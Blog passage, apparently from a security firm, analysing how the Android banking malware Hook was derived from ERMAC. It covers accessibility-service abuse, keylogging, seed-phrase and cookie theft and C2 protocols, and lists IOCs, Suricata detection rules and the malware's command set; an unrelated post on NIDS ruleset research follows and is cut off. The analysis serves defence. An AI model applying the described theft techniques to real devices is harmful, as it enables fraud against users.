In the screenshot above, you can see how ERMAC and Hook set up a WebView component and load the HTML code to be displayed over the target app by calling webView5.loadDataWithBaseURL(null, s6, "text/html", "UTF-8", null) and this.setContentView() on the WebView object. The “s6” variable will contain the data to be loaded. The main functionality is the same for both variants, with Hook having some additional logging messages.

The importance of accessibility services

Accessibility Service abuse plays an important role when it comes to web injections and other automated features in ERMAC and Hook. Accessibility services are used to assist users with disabilities, or users who may temporarily be unable to fully interact with their Android device. For example: users that are driving might need additional or alternative interface feedback. Accessibility services run in the background and receive callbacks from the system when an AccessibilityEvent is fired. Apps with an accessibility service can have full visibility over UI events, both from the system and from 3rd party apps. They can receive notifications, get the package name, list UI elements, extract text, and more. While these services are meant to assist users, they can also be abused by malicious apps for activities such as keylogging, automatically granting themselves additional permissions, and monitoring foreground apps and overlaying them with phishing windows.

When ERMAC or Hook malware is first launched, it prompts the victim with a window that instructs them to enable accessibility services for the malicious app.

Instruction window to enable the accessibility service, which is shown upon first execution of ERMAC and Hook malware.

A warning message is displayed before enabling the accessibility service, which shows what actions the app will be able to perform when this is enabled.

Warning message that is displayed before enabling accessibility services.

With accessibility services enabled, ERMAC and Hook malware automatically grants itself additional permissions such as permission to draw overlays. The onAccessibilityEvent() method monitors the package names from received accessibility events, and the web injection related code will be executed when a target app is launched.

Targeted applications

When the infected device is ready to communicate with the C2 server, it sends a list of applications that are currently installed on the device. The C2 server then responds with the target apps that it has injections for. While dynamically analysing the latest version of Hook, we sent a custom HTTP request to the C2 server to make it believe that we have a large number of apps (700+) installed. For this, we used the list of package names that CSIRT KNF had shared in an analysis report of Hook [2].

Part of our manually crafted HTTP request that includes a list of “installed apps” for our infected device.

The server responded with the list of target apps that the malware can display phishing windows for. Most of the targeted apps in both Hook and ERMAC are related to banking.

Part of the C2 server response that contains the target apps for overlay injections.

Keylogging

Keylogging functionality can be found in the onAccessibilityEvent() method of both ERMAC and Hook. For every accessibility event type that is triggered on the infected device, a method is called that contains keylogger functionality. This method then checks what the accessibility event type was in order to label the log, and extracts the text from the event. Comparing the keylogging implementation in ERMAC to the one in Hook, there are some slight differences in the accessibility event types that are checked for, but the main functionality of extracting text and sending it to the C2 with a certain label is the same.

Decompiled code snippet of keylogging in ERMAC and in Hook.

The ERMAC keylogger contains an extra check for accessibility event “TYPE_VIEW_SELECTED” (triggered when a user selects a view, such as tapping on a button). Accessibility services can extract information about a selected view, such as the text, and that is exactly what is happening here.

Hook specifically checks for two other accessibility events: the “TYPE_WINDOW_STATE_CHANGED” event (triggered when the state of an active window changes, for example when a new window is opened) or the “TYPE_WINDOW_CONTENT_CHANGED” event (triggered when the content within a window changes, like when the text within a window is updated).

It checks for these events in combination with the content change type “CONTENT_CHANGE_TYPE_TEXT” (indicating that the text of a UI element has changed). This tells us that the accessibility service is interested in changes of the textual content within a window, which is not surprising for a keylogger.

Stealing of crypto wallet seed phrases

Automatic stealing of recovery seeds from crypto wallets is one of the main features in ERMAC and Hook. This feature is actively developed, with support added for extra crypto wallets in the latest version of Hook.

For this feature, the accessibility service first checks if a crypto wallet app has been opened. Then, it will find UI elements by their ID (such as “com.wallet.crypto.trustapp:id/wallets_preference” and “com.wallet.crypto.trustapp:id/item_wallet_info_action”) and automatically click on these elements until it has navigated to the view that contains the recovery seed phrase. To the crypto wallet app, it will look like the user is browsing to this phrase by themselves.

Decompiled code that shows ERMAC and Hook searching for and clicking on UI elements in the Trust Wallet app.

Once the window with the recovery seed phrase is reached, it will extract the words from the recovery seed phrase and send them to the C2 server.

Decompiled code that shows the actions in ERMAC and Hook after obtaining the seed phrase.

The main implementation is the same in ERMAC and Hook for this feature, with Hook containing some extra logging messages and support for stealing seed phrases from additional cryptocurrency wallets.

Replacing copied crypto wallet addresses

Besides being able to automatically steal recovery seeds from opened crypto wallet apps, ERMAC and Hook can also detect whether a wallet address has been copied and replace the clipboard contents with their own wallet address. They do this by monitoring for the “TYPE_VIEW_TEXT_CHANGED” event, and checking whether the text matches a regular expression for Bitcoin and Ethereum wallet addresses. If it matches, they replace the clipboard text with the wallet address of the threat actor.

Decompiled code that shows how ERMAC and Hook replace copied crypto wallet addresses.
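From a defender's point of view, the same kind of pattern matching can be used to spot address-shaped strings and to check them against the two hardcoded actor addresses listed in this post. The following is a minimal Python sketch; the regular expressions are commonly used approximations and are an assumption, not the expressions found in the malware, and the function names are hypothetical.

```python
import re

# Approximate address shapes (assumption: NOT the malware's own regexes).
ETH_RE = re.compile(r"0x[0-9a-fA-F]{40}")
BTC_BECH32_RE = re.compile(r"bc1[ac-hj-np-z02-9]{11,71}")
BTC_LEGACY_RE = re.compile(r"[13][1-9A-HJ-NP-Za-km-z]{25,34}")

# Hardcoded actor addresses reported in this post, stored lowercased.
KNOWN_ACTOR_ADDRESSES = {
    "bc1ql34xd8ynty3myfkwaf8jqeth0p4fxkxg673vlf",
    "0x3cf7d4a8d30035af83058371f0c6d4369b5024ca",
}


def classify_address(text):
    """Return 'ethereum', 'bitcoin', or None for a candidate string."""
    candidate = text.strip()
    if ETH_RE.fullmatch(candidate):
        return "ethereum"
    if BTC_BECH32_RE.fullmatch(candidate) or BTC_LEGACY_RE.fullmatch(candidate):
        return "bitcoin"
    return None


def is_actor_address(text):
    """True if the string equals one of the known actor addresses."""
    return text.strip().lower() in KNOWN_ACTOR_ADDRESSES


if __name__ == "__main__":
    for sample in ("bc1ql34xd8ynty3myfkwaf8jqeth0p4fxkxg673vlf", "not an address"):
        print(sample, classify_address(sample), is_actor_address(sample))
```

A check like this could be run over clipboard test data or transaction logs during an investigation; it only validates the shape of an address, not its checksum.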

The wallet addresses that the actors use in both ERMAC and Hook are bc1ql34xd8ynty3myfkwaf8jqeth0p4fxkxg673vlf for Bitcoin and 0x3Cf7d4A8D30035Af83058371f0C6D4369B5024Ca for Ethereum. It’s worth mentioning that these wallet addresses are the same in all samples that we analysed. It appears that this feature has not been very successful for the actors, as they have received only two transactions at the time of writing.

Transactions received by the Ethereum wallet address of the actors.

Since the feature has been so unsuccessful, we assume that both received transactions were initiated by the actors themselves. The latest transaction was received from a verified Binance exchange wallet, and it’s unlikely that this comes from an infected device. The other transaction comes from a wallet that could be owned by the Hook actors.

Stealing of session cookies

The “cookie” command is exclusive to Hook and was only added in the latest version of this malware. This feature allows the malware operator to steal session cookies in order to take over the victim’s login session. To do so, a new WebViewClient is set up. When the victim has logged onto their account, the onPageFinished() method of the WebView will be called and it sends the stolen cookies to the C2 server.

Decompiled code that shows Google account session cookies will be sent to the C2 server.

All cookie stealing code is related to Google accounts. This is in line with DukeEugene’s announcement of new features, posted on April 1st, 2023. See #12 in the screenshot below.

DukeEugene announced new features in Hook, showing the main objective for the “cookie” command.

C2 communication protocol

HTTP in ERMAC

ERMAC is known to use the HTTP protocol for communicating with the C2 server, where data is encrypted using AES-256-CBC and then Base64 encoded. The bot sends HTTP POST requests to a randomly generated URL that ends with “.php/” (note that the IP of the C2 server remains the same).

Decompiled code that shows how request URLs are built in ERMAC.
Example HTTP POST request that was made during dynamic analysis of ERMAC.

WebSockets in Hook

The first editions of Hook introduced WebSocket communication using Socket.IO, and data is encrypted using the same mechanism as in ERMAC. The Socket.IO library is built on top of the WebSocket protocol and offers low-latency, bidirectional and event-based communication between a client and a server. Socket.IO provides additional guarantees such as fallback to the HTTP protocol and automatic reconnection [3].

Screenshot of WebSocket communication using Socket.IO in Hook.

The screenshot above shows that the login command was issued to the server, with the user ID of the infected device being sent as encrypted data. The “42” at the beginning of the message is standard in Socket.IO, where the “4” stands for the Engine.IO “message” packet type and the “2” for Socket.IO’s “message” packet type [3].
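To make the two-digit prefix concrete, here is a minimal Python sketch that splits a text frame into its Engine.IO and Socket.IO packet types and decodes the JSON payload. The type tables follow the published Engine.IO and Socket.IO protocol specifications, where Socket.IO type 2 is formally named EVENT; the sample frame and the function name are hypothetical, and the parser deliberately ignores binary attachments.

```python
import json

ENGINE_IO_TYPES = {
    "0": "open", "1": "close", "2": "ping", "3": "pong",
    "4": "message", "5": "upgrade", "6": "noop",
}
SOCKET_IO_TYPES = {
    "0": "CONNECT", "1": "DISCONNECT", "2": "EVENT", "3": "ACK",
    "4": "CONNECT_ERROR", "5": "BINARY_EVENT", "6": "BINARY_ACK",
}


def parse_frame(frame):
    """Split a text frame such as '42["login","..."]' into its parts."""
    if not frame or frame[0] not in ENGINE_IO_TYPES:
        raise ValueError("not an Engine.IO text frame")
    result = {"engine_io": ENGINE_IO_TYPES[frame[0]], "socket_io": None, "payload": None}
    # Only Engine.IO "message" packets carry a Socket.IO packet.
    if result["engine_io"] != "message" or len(frame) < 2:
        return result
    if frame[1] not in SOCKET_IO_TYPES:
        raise ValueError("unknown Socket.IO packet type")
    result["socket_io"] = SOCKET_IO_TYPES[frame[1]]
    body = frame[2:]
    # Skip an optional namespace or ack id by jumping to the first JSON token.
    starts = [i for i in (body.find("["), body.find("{")) if i != -1]
    if starts:
        result["payload"] = json.loads(body[min(starts):])
    return result


if __name__ == "__main__":
    # Hypothetical frame: event name followed by an opaque encrypted blob.
    print(parse_frame('42["login","QUJDREVG"]'))
```

In captured traffic, the second element of the payload would be the encrypted, Base64-encoded data described above rather than readable text.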

Mix and match – Protocols in latest versions of Hook

The latest Hook version that we’ve analysed contains the ERMAC HTTP protocol implementation, as well as the WebSocket implementation which already existed in previous editions of Hook. The Hook code snippet below shows that it uses the exact same code implementation as observed in ERMAC to build the URLs for HTTP requests.

Decompiled code that shows the latest version of Hook implemented the same logic for building URLs as ERMAC.

Both Hook and ERMAC use the “checkAP” command to check for commands sent by the C2 server. In the screenshot below, you can see that the malware operator sent the “killme” command to the infected device to uninstall Hook. This shows that the ERMAC HTTP protocol is actively used in the latest versions of Hook, together with the already existing WebSocket implementation.

The infected device is checking for commands sent by the C2 in Hook.

C2 servers

During our investigation into the technical differences between Hook and ERMAC, we have also collected C2 servers related to both families. From these servers, Russia is clearly the preferred country for hosting Hook and ERMAC C2s. We have identified a total of 23 Hook C2 servers that are hosted in Russia.

Other countries in which we have found ERMAC and Hook C2 servers hosted are:

  • The Netherlands
  • United Kingdom
  • United States
  • Germany
  • France
  • Korea
  • Japan
Popular countries for hosting Hook and ERMAC C2 servers.

The end?

On the 19th of April 2023, DukeEugene announced that they are closing the Hook project due to leaving for “special military operation”. The actor mentions that the coder of the Hook project, who goes by the nickname “RedDragon”, will continue to support their clients until their lease runs out.

DukeEugene mentions that they are closing the Hook project. Note that the first post was initially created on 19 April 2023 and edited a day later.

Two days prior to this announcement, the coder of Hook created a post stating that the source code of Hook is for sale at a price of $70,000. Nearly a month later, on May 11th, the coder asked if the thread could be closed as the source code was sold.

Hook’s coder announcing that the source code is for sale.

Observations

In the “Replacing copied crypto wallet addresses” section of this blog, we mentioned that the first received transaction comes from an Ethereum wallet address that could possibly be owned by the Hook actors. We noticed that this wallet received a transaction of roughly $25,000 the day after Hook was announced sold. This could be a coincidence, but the fact that this wallet was also the first to send (a small amount of) money to the Ethereum address that is hardcoded in Hook and ERMAC makes us suspect a connection.

Ethereum transaction that could be related to Hook.

We can’t verify whether the messages from DukeEugene and RedDragon are true. But if they are, we expect to see interesting new forks of Hook in the future.

In this blog we’ve debunked DukeEugene’s statement of Hook being fully developed from scratch. Additionally, in DukeEugene’s advertisement of HookBot we see a screenshot of the Hook panel that seemed to show similarities with ERMAC’s panel.

Conclusion

While the actors of Hook had announced that the malware was written from scratch, it is clear that the ERMAC source code was used as a base. All commands that are present in ERMAC also exist in Hook, and the code implementation of these commands is nearly identical in both malware families. Both Hook and ERMAC contain typical features to steal credentials which are common in Android malware, such as overlay attacks/injections and keylogging. Perhaps a more interesting feature that exists in both malware families is the automated stealing of recovery seeds from cryptocurrency wallets.

While Hook was not written completely from scratch, the authors have added interesting new features compared to ERMAC. With the added capability of being able to stream the victim’s screen and interacting with the UI, operators of Hook can gain complete control over infected devices and perform actions on the user’s behalf. Other interesting new features include the ability to take a photo of the victim using their front facing camera, stealing of cookies related to Google login sessions, and the added support for stealing recovery seeds from additional cryptocurrency wallets.

Besides these new features, significant changes were made in the protocol for communicating with the C2 server. The first versions of Hook introduced WebSocket communication using the Socket.IO library. The latest version of Hook added the HTTP protocol implementation that was already present in ERMAC and can use this next to WebSocket communication.

Hook had a relatively short run. It was first announced on the 12th of January 2023, and the closing of the project was announced on April 19th, 2023, with the actor claiming that he is leaving for “special military operation”. The coder of Hook has allegedly put the source code up for sale at a price of $70,000 and stated that it was sold on May 11th, 2023. If these announcements are true, it could mean that we will see interesting new forks of Hook in the future.

Indicators of Compromise

Analysed samples

Family | Package name | File hash (SHA-256)
Hook | com.lojibiwawajinu.guna | c5996e7a701f1154b48f962d01d457f9b7e95d9c3dd9bbd6a8e083865d563622
Hook | com.wawocizurovi.gadomi | d651219c28eec876f8961dcd0a0e365df110f09b7ae72eccb9de8c84129e23cb
ERMAC | com.cazojowiruje.tutado | e0bd84272ea93ea857cc74a745727085cf214eef0b5dcaf3a220d982c89cea84
ERMAC | com.jakedegivuwuwe.yewo | 6d8707da5cb71e23982bd29ac6a9f6069d6620f3bc7d1fd50b06e9897bc0ac50
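To check whether a file on disk is one of the analysed samples, its SHA-256 digest can be compared against the hashes above. The following is a minimal Python sketch using only the standard library; the function names are hypothetical.

```python
import hashlib

# SHA-256 hashes of the analysed samples, mapped to (family, package name).
KNOWN_SAMPLES = {
    "c5996e7a701f1154b48f962d01d457f9b7e95d9c3dd9bbd6a8e083865d563622": ("Hook", "com.lojibiwawajinu.guna"),
    "d651219c28eec876f8961dcd0a0e365df110f09b7ae72eccb9de8c84129e23cb": ("Hook", "com.wawocizurovi.gadomi"),
    "e0bd84272ea93ea857cc74a745727085cf214eef0b5dcaf3a220d982c89cea84": ("ERMAC", "com.cazojowiruje.tutado"),
    "6d8707da5cb71e23982bd29ac6a9f6069d6620f3bc7d1fd50b06e9897bc0ac50": ("ERMAC", "com.jakedegivuwuwe.yewo"),
}


def sha256_of_file(path, chunk_size=65536):
    """Hash a file in chunks so large APKs do not need to fit in memory."""
    digest = hashlib.sha256()
    with open(path, "rb") as handle:
        for chunk in iter(lambda: handle.read(chunk_size), b""):
            digest.update(chunk)
    return digest.hexdigest()


def match_sample(path):
    """Return (family, package name) if the file is a known sample, else None."""
    return KNOWN_SAMPLES.get(sha256_of_file(path))
```

Calling `match_sample("suspicious.apk")` on a file of interest returns the family and package name for a known sample, or `None` otherwise. A hash match only identifies these exact files; repackaged builds will have different hashes.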

C2 servers

Family | IP address
Hook | 5.42.199[.]22
Hook | 45.81.39[.]149
Hook | 45.93.201[.]92
Hook | 176.100.42[.]11
Hook | 91.215.85[.]223
Hook | 91.215.85[.]37
Hook | 91.215.85[.]23
Hook | 185.186.246[.]69
ERMAC | 5.42.199[.]91
ERMAC | 31.41.244[.]187
ERMAC | 45.93.201[.]92
ERMAC | 92.243.88[.]25
ERMAC | 176.113.115[.]66
ERMAC | 165.232.78[.]246
ERMAC | 51.15.150[.]5
ERMAC | 176.100.42[.]11
ERMAC | 91.215.85[.]22
ERMAC | 35.91.53[.]224
ERMAC | 193.106.191[.]148
ERMAC | 20.249.63[.]72
ERMAC | 62.204.41[.]98
ERMAC | 193.106.191[.]121
ERMAC | 193.106.191[.]116
ERMAC | 176.113.115[.]150
ERMAC | 91.213.50[.]62
ERMAC | 193.106.191[.]118
ERMAC | 5.42.199[.]3
ERMAC | 193.56.146[.]176
ERMAC | 62.204.41[.]94
ERMAC | 176.113.115[.]67
ERMAC | 108.61.166[.]245
ERMAC | 45.159.248[.]25
ERMAC | 20.108.0[.]165
ERMAC | 20.210.252[.]118
ERMAC | 68.178.206[.]43
ERMAC | 35.90.154[.]240
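The addresses above are defanged with “[.]”. Before loading them into a blocklist or SIEM query they need to be converted back and validated. The following is a minimal Python sketch that does this for a subset of the rows and groups them by family; the helper names are hypothetical.

```python
import ipaddress

# A subset of the rows above, as (family, defanged IP) pairs.
IOC_ROWS = [
    ("Hook", "5.42.199[.]22"),
    ("Hook", "45.93.201[.]92"),
    ("Hook", "176.100.42[.]11"),
    ("ERMAC", "5.42.199[.]91"),
    ("ERMAC", "45.93.201[.]92"),
    ("ERMAC", "176.100.42[.]11"),
]


def refang(ioc):
    """Turn '1.2.3[.]4' into '1.2.3.4', raising ValueError if it is not an IP."""
    address = ioc.replace("[.]", ".")
    return str(ipaddress.ip_address(address))


def group_by_family(rows):
    """Map each family name to the set of its refanged IP addresses."""
    grouped = {}
    for family, ioc in rows:
        grouped.setdefault(family, set()).add(refang(ioc))
    return grouped


if __name__ == "__main__":
    grouped = group_by_family(IOC_ROWS)
    # Addresses that are listed for both families.
    print(sorted(grouped["Hook"] & grouped["ERMAC"]))
```

Grouping by family also makes overlap visible: 45.93.201[.]92 and 176.100.42[.]11 are listed for both Hook and ERMAC.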

Network detection

The following Suricata rules were tested successfully against Hook network traffic:

# Detection for Hook/ERMAC mobile malware
alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"FOX-SRT – Mobile Malware – Possible Hook/ERMAC HTTP POST"; flow:established,to_server; http.method; content:"POST"; http.uri; content:"/php/"; depth:5; content:".php/"; isdataat:!1,relative; fast_pattern; pcre:"/^\/php\/[a-z0-9]{1,21}\.php\/$/U"; classtype:trojan-activity; priority:1; threshold:type limit,track by_src,count 1,seconds 3600; metadata:ids suricata; metadata:created_at 2023-06-02; metadata:updated_at 2023-06-07; sid:21004440; rev:2;)
alert tcp $HOME_NET any -> $EXTERNAL_NET any (msg:"FOX-SRT – Mobile Malware – Possible Hook Websocket Packet Observed (login)"; content:"|81|"; depth:1; byte_test:1,&,0x80,1; luajit:hook.lua; classtype:trojan-activity; priority:1; threshold:type limit,track by_src,count 1,seconds 3600; metadata:ids suricata; metadata:created_at 2023-06-02; metadata:updated_at 2023-06-07; sid:21004441; rev:2;)

The second Suricata rule uses an additional Lua script, which can be found here
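The URI pattern from the first rule can also be applied outside Suricata, for example when searching historical proxy or web gateway logs. The following is a minimal Python sketch that mirrors the rule's method check and regular expression; the function name and the way log fields are passed in are assumptions.

```python
import re

# Same shape as the pcre in the first rule: /php/<1-21 lowercase alnum>.php/
HOOK_ERMAC_URI = re.compile(r"/php/[a-z0-9]{1,21}\.php/")


def looks_like_hook_ermac_post(method, uri):
    """True for POST requests whose URI path matches the rule's pattern."""
    return method.upper() == "POST" and HOOK_ERMAC_URI.fullmatch(uri) is not None


if __name__ == "__main__":
    # Hypothetical log entries as (method, URI path) pairs.
    entries = [("POST", "/php/a1b2c3.php/"), ("GET", "/index.php")]
    for method, uri in entries:
        print(method, uri, looks_like_hook_ermac_post(method, uri))
```

Like the rule itself, this is a heuristic: a match is a lead for further investigation, not proof of infection.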

List of Commands

Family | Command | Description
ERMAC, Hook 1 & 2 | sendsms | Sends a specified SMS message to a specified number. If the SMS message is too large, it will send the message in multiple parts
ERMAC, Hook 1 & 2 | startussd | Executes a given USSD code on the victim’s device
ERMAC, Hook 1 & 2 | forwardcall | Sets up a call forwarder to forward all calls to the specified number in the payload
ERMAC, Hook 1 & 2 | push | Displays a push notification on the victim’s device, with a custom app name, title, and text to be edited by the malware operator
ERMAC, Hook 1 & 2 | getcontacts | Gets a list of all contacts on the victim’s device
ERMAC, Hook 1 & 2 | getaccounts | Gets a list of the accounts on the victim’s device by their name and account type
ERMAC, Hook 1 & 2 | logaccounts | Gets a list of the accounts on the victim’s device by their name and account type
ERMAC, Hook 1 & 2 | getinstallapps | Gets a list of the installed apps on the victim’s device
ERMAC, Hook 1 & 2 | getsms | Steals all SMS messages from the victim’s device
ERMAC, Hook 1 & 2 | startinject | Performs a phishing overlay attack against the given application
ERMAC, Hook 1 & 2 | openurl | Opens the specified URL
ERMAC, Hook 1 & 2 | startauthenticator2 | Starts the Google Authenticator app
ERMAC, Hook 1 & 2 | trust | Launches the Trust Wallet app
ERMAC, Hook 1 & 2 | mycelium | Launches the Mycelium Wallet app
ERMAC, Hook 1 & 2 | piuk | Launches the Blockchain Wallet app
ERMAC, Hook 1 & 2 | samourai | Launches the Samourai Wallet app
ERMAC, Hook 1 & 2 | bitcoincom | Launches the Bitcoin Wallet app
ERMAC, Hook 1 & 2 | toshi | Launches the Coinbase Wallet app
ERMAC, Hook 1 & 2 | metamask | Launches the Metamask Wallet app
ERMAC, Hook 1 & 2 | sendsmsall | Sends a specified SMS message to all contacts on the victim’s device. If the SMS message is too large, it will send the message in multiple parts
ERMAC, Hook 1 & 2 | startapp | Starts the app specified in the payload
ERMAC, Hook 1 & 2 | clearcash | Sets the “autoClickCache” shared preference key to value 1, and launches the “Application Details” setting for the specified app (probably to clear the cache)
ERMAC, Hook 1 & 2 | clearcache | Sets the “autoClickCache” shared preference key to value 1, and launches the “Application Details” setting for the specified app (probably to clear the cache)
ERMAC, Hook 1 & 2 | calling | Calls the number specified in the “number” payload, tries to lock the device and attempts to hide and mute the application
ERMAC, Hook 1 & 2 | deleteapplication | Uninstalls a specified application
ERMAC, Hook 1 & 2 | startadmin | Sets the “start_admin” shared preference key to value 1, which is probably used as a check before attempting to gain Device Admin privileges (as seen in Hook samples)
ERMAC, Hook 1 & 2 | killme | Stores the package name of the malicious app in the “killApplication” shared preference key, in order to uninstall it. This is the kill switch for the malware
ERMAC, Hook 1 & 2 | updateinjectandlistapps | Gets a list of the currently installed apps on the victim’s device, and downloads the injection target lists
ERMAC, Hook 1 & 2 | gmailtitles | Sets the “gm_list” shared preference key to the value “start” and starts the Gmail app
ERMAC, Hook 1 & 2 | getgmailmessage | Sets the “gm_mes_command” shared preference key to the value “start” and starts the Gmail app
Hook 1 & 2 | start_vnc | Starts capturing the victim’s screen constantly (streaming)
Hook 1 & 2 | stop_vnc | Stops capturing the victim’s screen constantly (streaming)
Hook 1 & 2 | takescreenshot | Takes a screenshot of the victim’s device (note that it starts the same activity as for the “start_vnc” command, but it does so without the extra “streamScreen” set to true to only take one screenshot)
Hook 1 & 2 | swipe | Performs a swipe gesture with the specified 4 coordinates
Hook 1 & 2 | swipeup | Performs a swipe up gesture
Hook 1 & 2 | swipedown | Performs a swipe down gesture
Hook 1 & 2 | swipeleft | Performs a swipe left gesture
Hook 1 & 2 | swiperight | Performs a swipe right gesture
Hook 1 & 2 | scrollup | Performs a scroll up gesture
Hook 1 & 2 | scrolldown | Performs a scroll down gesture
Hook 1 & 2 | onkeyevent | Performs a certain action depending on the specified key payload (POWER DIALOG, BACK, HOME, LOCK SCREEN, or RECENTS)
Hook 1 & 2 | onpointerevent | Sets X and Y coordinates and performs an action based on the payload text provided. Three options: “down”, “continue”, and “up”. It looks like these payload texts work together, as in: it first sets the starting coordinates where it should press down, then it sets the coordinates where it should draw a line to from the previous starting coordinates, then it performs a stroke gesture using this information
Hook 1 & 2 | longpress | Dispatches a long press gesture at the specified coordinates
Hook 1 & 2 | tap | Dispatches a tap gesture at the specified coordinates
Hook 1 & 2 | clickat | Clicks at a specific UI element
Hook 1 & 2 | clickattext | Clicks on the UI element with a specific text value
Hook 1 & 2 | clickatcontaintext | Clicks on the UI element that contains the payload text
Hook 1 & 2 | cuttext | Replaces the clipboard on the victim’s device with the payload text
Hook 1 & 2 | settext | Sets a specified UI element to the specified text
Hook 1 & 2 | openapp | Opens the specified app
Hook 1 & 2 | openwhatsapp | Sends a message through Whatsapp to the specified number
Hook 1 & 2 | addcontact | Adds a new contact to the victim’s device
Hook 1 & 2 | getcallhistory | Gets a log of the calls that the victim made
Hook 1 & 2 | makecall | Calls the number specified in the payload
Hook 1 & 2 | forwardsms | Sets up an SMS forwarder to forward the received and sent SMS messages from the victim device to the specified number in the payload
Hook 1 & 2 | getlocation | Gets the geographic coordinates (latitude and longitude) of the victim
Hook 1 & 2 | getimages | Gets a list of all images on the victim’s device
Hook 1 & 2 | downloadimage | Downloads an image from the victim’s device
Hook 1 & 2 | fmmanager | Either lists the files at a specified path (additional parameter “ls”), or downloads a file from the specified path (additional parameter “dl”)
Hook 2 | send_sms_many | Sends an SMS message to multiple phone numbers
Hook 2 | addwaitview | Displays a “wait / loading” view with a progress bar, custom background colour, text colour, and text to be displayed
Hook 2 | removewaitview | Removes a “RelativeLayout” view group, which displays child views together in relative positions. More specifically: this command removes the “wait / loading” view that is displayed on the victim’s device as a result of the “addwaitview” command
Hook 2 | addview | Adds a new view with a black background that covers the entire screen
Hook 2 | removeview | Removes a “LinearLayout” view group, which arranges other views either horizontally in a single row or vertically in a single column. More specifically: this command removes the view with the black background that was added by the “addview” command
Hook 2 | cookie | Steals session cookies (targets victim’s Google account)
Hook 2 | safepal | Starts the Safepal Wallet application (and steals seed phrases as a result of starting this application, as observed during analysis of the accessibility service)
Hook 2 | exodus | Starts the Exodus Wallet application (and steals seed phrases as a result of starting this application, as observed during analysis of the accessibility service)
Hook 2 | takephoto | Takes a photo of the victim using the front facing camera

References


[1] – https://www.threatfabric.com/blogs/hook-a-new-ermac-fork-with-rat-capabilities
[2] – https://cebrf.knf.gov.pl/komunikaty/artykuly-csirt-knf/362-ostrzezenia/858-hookbot-a-new-mobile-malware
[3] – https://socket.io/docs/v4/

Ruling the rules

Mathew Vermeer is a doctoral candidate at the Organisation Governance department of the faculty of Technology, Policy and Management of Delft University of Technology. At the same university, he received both a BSc degree in Computer Science and Engineering and an MSc degree in Computer Science with a specialization in cyber security. His master’s thesis examined (machine learning-based) network intrusion detection systems (NIDSs), their effectiveness in practice, and methods for their proper evaluation in real-world settings. In 2019 he joined the university as a PhD researcher. Mathew’s current research similarly includes NIDS performance and management processes within organizations, as well as external network asset discovery and security incident prediction.

Introduction

The following is a short summary of a study conducted as part of my PhD research at TU Delft in collaboration with Fox-IT. We’re interested in studying the different processes and technologies that determine or impact the security posture of organizations. In this case, we set out to better understand the signature-based network intrusion detection system (NIDS). Ubiquitous within the field, it has been part of the bedrock of network security for over two decades, and industry reports have been predicting its demise for almost as long [1]. Both industry and academia [2, 3] seem to be pushing for a gradual phasing out of the supposedly “less-capable” [2] signature-based NIDS in favour of machine-learning (ML) methods. The former uses sets of signatures (or rules) that inform the NIDS what to look for in network traffic and flag as potentially malicious, while the latter uses statistical techniques to find potentially malicious anomalies within network traffic. The underlying motivation is that conventional rule- and signature-based methods are deemed unable to keep up with the fast-evolving threats and will, therefore, become increasingly obsolete. While some argue for complementary use, others imply outright replacement to be a more effective solution, comparing their own ML system with an improperly configured (i.e., enabling every single rule from the Emerging Threats community ruleset) signature-based NIDS to try to drive home the point [4].

On the other hand, walk into any security operations center (SOC) and what you’ll see is analysts triaging alerts generated by NIDSs that still rely heavily on rulesets. So how much of this push is simply hype and how much is backed up by actual data? Do traditional signature-based NIDSs truly no longer add to an organization’s security?

To answer this, we analyzed alert and incident data from Fox-IT, and the many proprietary and commercial rulesets employed at Fox-IT spanning from mid-2009 to mid-2018. We used this data to examine how Fox-IT manages its own signature-based NIDS to provide security for its clients. The most interesting results are described below.

NIDS environment

First, it’s helpful to get acquainted with the environment in place at Fox-IT. The figure below roughly illustrates the NIDS pipeline in use at Fox-IT, starting from the NIDS rules on the left to the incidents all the way on the right. Rules are either purchased from a threat intel vendor or created in-house. Of note is that in-house rules are usually tested for a period of time, during which they are tweaked until their performance is deemed acceptable; what counts as acceptable can vary depending on the novelty, severity, etc., of the threat they are trying to detect. Once that condition is reached, the rules are added to the production environment, where they can again be modified based on their performance in a real-world environment.

Modelling the workflows in this way allows us to find relationships between alerts, incidents, and rules, as well as the effects that security events have on the manner in which rules are managed.

Custom ruleset important for proper functioning of NIDS

One of the go-to metrics for measuring the effectiveness of security systems is their precision [5]. This is because, as opposed to simple accuracy, precision penalizes false positives. Since false positive detections are something rule developers and SOC analysts often strive to minimize, it stands to reason that such occurrences are taken into account when measuring the performance of an NIDS. We found that the custom ruleset Fox-IT creates in-house is critical for the proper functioning of its NIDS. The precision of Fox-IT’s proprietary ruleset is higher than that of the commercial sets employed: an average of 0.74, in contrast to 0.68 and 0.65 for the two commercial rulesets, respectively. Important to note here is that the commercial sets achieve such precision scores only because of extensive tuning by the Fox-IT team prior to introducing the rules into the sensors. Had this not occurred, their measured precision would be much lower (in case the sensors had not burst into flames beforehand). The Fox-IT ruleset is much smaller than the commercial rulesets: around 2,000 rules versus the tens of thousands of commercial rules from ET and Talos. Nevertheless, the rules within Fox-IT’s own ruleset are present in 27% of all true positive incidents. This is surprising, given the massive difference in ruleset size (2,000 Fox-IT rules vs. 50,000+ commercial rules) and, therefore, threat coverage. Both findings here clearly demonstrate the higher utility of Fox-IT’s proprietary rules. Still, they clearly play a complementary role to the commercial rules, which is something we explore in a different study.
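To illustrate why precision is preferred over accuracy here, the following minimal Python sketch computes both from confusion-matrix counts. The counts are hypothetical and chosen only so that the precision works out to 0.74; they are not taken from the study.

```python
def precision(true_pos, false_pos):
    """Fraction of raised incidents that were real: TP / (TP + FP)."""
    return true_pos / (true_pos + false_pos)


def accuracy(true_pos, false_pos, true_neg, false_neg):
    """Fraction of all decisions that were correct."""
    total = true_pos + false_pos + true_neg + false_neg
    return (true_pos + true_neg) / total


if __name__ == "__main__":
    # Hypothetical counts: benign traffic (true negatives) dominates.
    tp, fp, tn, fn = 74, 26, 9900, 0
    print(f"precision = {precision(tp, fp):.2f}")
    print(f"accuracy  = {accuracy(tp, fp, tn, fn):.4f}")
```

Because benign traffic vastly outnumbers malicious traffic, accuracy stays close to 1 even when roughly a quarter of the raised incidents are false positives, whereas precision exposes that directly.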

Newest rules produce most incidents

